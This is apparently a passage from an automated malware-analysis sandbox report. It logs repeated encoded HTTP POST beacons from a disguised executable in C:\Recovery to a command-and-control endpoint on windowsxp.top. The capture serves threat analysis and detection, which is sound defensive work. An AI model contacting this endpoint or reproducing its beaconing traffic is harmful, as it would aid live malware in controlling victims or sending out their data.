                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bm%2BFVRppDKVfML%2FkRaKVTB%2FYUZqdyrqUXh3ZtHF2owv0PPlgX2hmkZ%2FEA3fUHNSJwIr0BYABK3kfi18aNkZWsN8j3VxClw8QoOL5MMd69dgLEbRbX0QYROrFgwXCGV6O"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7ecbe8245f3-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1093&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2061&delivery_rate=1341983&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 1a 23 07 2b 0d 3d 02 2e 09 3e 0f 00 00 30 3c 0c 01 38 32 28 5b 3e 04 21 57 2e 16 07 0e 30 24 0b 09 3c 39 24 11 37 07 33 0b 3e 0f 21 5e 00 1c 27 5f 22 58 3a 0a 32 2b 02 5a 24 33 2f 05 36 2e 3f 5d 29 2e 32 0f 3c 00 27 03 3e 3b 20 09 2c 11 0f 57 26 2a 32 13 2d 28 29 02 2b 2a 2a 54 0c 14 21 12 2e 3c 24 13 35 0f 13 1e 3d 22 19 04 33 3d 37 0a 24 29 2c 56 3c 02 0d 1b 3f 03 35 5a 22 02 06 59 3c 16 04 5a 24 2d 3b 10 3d 14 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"#+=.>0<82([>!W.0$<9$73>!^'_"X:2+Z$3/6.?]).2<'>; ,W&*2-()+**T!.<$5="3=7$),V<?5Z"Y<Z$-;="T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  63192.168.2.450010188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:38.642837048 CET345OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:38.993130922 CET1012OUTData Raw: 55 5a 58 54 5e 5a 53 54 54 58 57 54 54 54 5b 5e 59 58 5b 51 52 51 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZXT^ZSTTXWTTT[^YX[QRQR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$%(X59*66$\,$'384)/? 1$-=+><.!Y##X('
                                                                                                                  Oct 27, 2024 19:23:39.243845940 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:39.548991919 CET774INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QXVkiuK4eWUCuN76LcC6hnfeVEX%2FnKmMpGQ3iE%2Fq%2FCGAG%2Fa4NHb058NgNn3WYtMUU4Nt3uqWw%2FG%2FRspLOlQxcZ8Xo8VEpd1RXTLqi1gHSGI%2Fg5fsLwO0RFO0tBQ1ZdfB"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7edee5e3aa6-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1252&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=928205&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:39.549011946 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  64192.168.2.450017188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:39.697731972 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:40.055757999 CET1012OUTData Raw: 55 54 5d 58 5e 5e 53 53 54 58 57 54 54 51 5b 5d 59 5d 5b 51 52 53 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UT]X^^SSTXWTTQ[]Y][QRSR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y% Z5656-<0#,=#)?V#"8=<>,.?!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:40.302079916 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:40.598712921 CET770INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ENrIhVT8vD1VshqxKtPMciKiLolIGWH0vTkp1cNq3D36XtjGsdSH5bCMvlo0mkzQsykIJG6wOQ0rTENVU1MN5Yi%2Ft1e6ZOZEI0CoiI3Tv2epW%2BPDSSKXttksyx1423Ae"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7f48c31ea8c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1197&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1157474&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  65192.168.2.450023188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:40.815393925 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:41.165080070 CET1012OUTData Raw: 50 55 58 5f 5b 5c 56 52 54 58 57 54 54 51 5b 5d 59 59 5b 51 52 52 52 5b 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUX_[\VRTXWTTQ[]YY[QRRR[T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY''.695,4(30,X?(/?"23X;#^>>^,?!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:41.427539110 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:41.639210939 CET765INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a18Jd70F6kJ97wU6XeoUULAmebIPttynSoYIN28%2BSqi2N2M8ORI18utM42DBSAomZsHUQvYEf%2F5AVUmJQni1pzxWtcPasc3d0FY7UX6JRf8emsEq4l67CASjJm5e5Ekf"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7fb8a823ab0-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1132&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1327222&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:41.639252901 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  66192.168.2.450032188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:41.769871950 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:42.173346043 CET1012OUTData Raw: 55 54 58 5f 5e 5c 56 56 54 58 57 54 54 5d 5b 5b 59 50 5b 5c 52 50 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UTX_^\VVTXWTT][[YP[\RPRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2- _"%558^.'3$+(Q/>?##";[,[#).X-!Y##X(
                                                                                                                  Oct 27, 2024 19:23:42.372852087 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:42.591228962 CET770INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cv7owFSGkXhxzaHun3KpyKuNpUgSl56XWZZBmH0tB8st7tnt9sbO87JFRUOkzTFZbZOzqj9xy6QOL5SMUDVDIXYTVAtEqgRy4%2FbkH%2FX1Ihu8LATsY5NQF4lKVvE3DLAm"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8017a946bdd-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1282550&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  67192.168.2.450039188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:42.934261084 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:43.289904118 CET1012OUTData Raw: 55 5a 58 5c 5e 59 56 55 54 58 57 54 54 51 5b 5b 59 50 5b 5a 52 57 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UZX\^YVUTXWTTQ[[YP[ZRWRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY''>(!)6!&+,70\04,X S(/ +-.?Y)<>_-?!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:43.535711050 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:43.839453936 CET780INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJKSbAEOJgHtL4bKumPBPv%2BuOy1sLgqDfbr9l4MqvVprtIrNe0GHDsX3sbA2Ku5kVkDvOpelgDW3kliP6ukyhkjiH%2BUGZseDp%2FgJPqZjExu9TKC4%2BtfG9%2F%2BicCx%2Fuz7s"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b808bab40c1f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1166&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1309222&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  68192.168.2.450045188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:43.983424902 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:44.336946964 CET1012OUTData Raw: 55 56 58 58 5e 59 56 50 54 58 57 54 54 53 5b 5e 59 58 5b 59 52 54 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVXX^YVPTXWTTS[^YX[YRTR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\&< 9&6%'-$Y0+--7>4#8,=0=,.[9?!Y##X(;
                                                                                                                  Oct 27, 2024 19:23:44.585088968 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:44.783058882 CET778INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tDxn%2BDUlEnqylr%2FV2qXJasbKnYi9pCTZqLXQUUuUN37I17YovCMSK6vpIIpKnyTKVfZiy4mMqRu%2BT%2F%2FA4UHqrr4lvcYAjAAQx9bKzI6J2n83uThyw59LehEjMnCcDB%2BM"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b80f4b350c27-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1284&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1093655&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  69192.168.2.450046188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:44.401252985 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:44.758749962 CET1716OUTData Raw: 55 52 5d 5b 5e 52 53 55 54 58 57 54 54 56 5b 5d 59 5a 5b 5a 52 55 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UR][^RSUTXWTTV[]YZ[ZRURXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&.$"*X#5<\.70^$+/(R>?#T;8<>%.!Y##X(/
                                                                                                                  Oct 27, 2024 19:23:45.000314951 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:45.224514961 CET917INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nDD1jSABsUX1%2FbprVTufmp53Y5UrpGB84qUUuQW9RRCDE7aPBvf2xCXEND46FFQ3DV4jQI45ub2UqlYx5l6DT7WM7DMCizJEjsz1tI5HWox0Xx2G7haraYdT1HqGe1Fz"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b811dfa82e5b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1314&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1118146&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5d 37 2e 3f 0c 3d 3f 35 1c 3e 31 32 03 33 3f 2e 04 2c 21 3b 02 2a 04 3a 0f 2d 06 0c 51 24 1a 0b 45 28 07 33 06 20 10 23 0a 2a 0f 21 5e 00 1c 27 14 20 3e 04 09 27 3b 24 5e 33 09 24 5e 35 03 28 04 3d 3d 21 12 2b 00 20 5f 3c 16 2f 50 2f 3f 22 0d 26 2a 3d 02 38 06 26 5f 2b 2a 2a 54 0c 14 21 1f 2e 11 38 5e 21 0f 21 53 3e 54 3c 5b 26 3e 0e 15 27 2a 2c 1e 2b 2c 27 5c 3f 3d 1c 00 20 3c 28 10 28 01 22 5d 33 13 06 04 3e 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"]7.?=?5>123?.,!;*:-Q$E(3 #*!^' >';$^3$^5(==!+ _</P/?"&*=8&_+**T!.8^!!S>T<[&>'*,+,'\?= <(("]3>."T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  70192.168.2.450056188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:45.639895916 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:45.993535995 CET1012OUTData Raw: 50 51 58 55 5e 59 53 53 54 58 57 54 54 52 5b 5e 59 50 5b 5c 52 55 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQXU^YSSTXWTTR[^YP[\RUR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\&4[!))X!\: \$--(S)<(43X->+=Z5,/!Y##X(
                                                                                                                  Oct 27, 2024 19:23:46.250893116 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:46.571002960 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJnV9EUeqhErAYQcHdRcL3NWxpwwYUfg7kd8RcPYdTE3l%2FblPWwgHZ04bh5DyGWDg4WWRPLFi3JAXGw2EPnwPRJUUO%2FwiKnXT4cEUt4nJdKNPAZOh6sugY%2FzNlxSDslU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b819ab1f2e1e-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1460&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1124223&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  71192.168.2.450062188.114.97.3803512C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:23:46.706269979 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:47.055536985 CET1012OUTData Raw: 50 52 5d 5c 5e 58 53 54 54 58 57 54 54 52 5b 5e 59 50 5b 5b 52 53 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
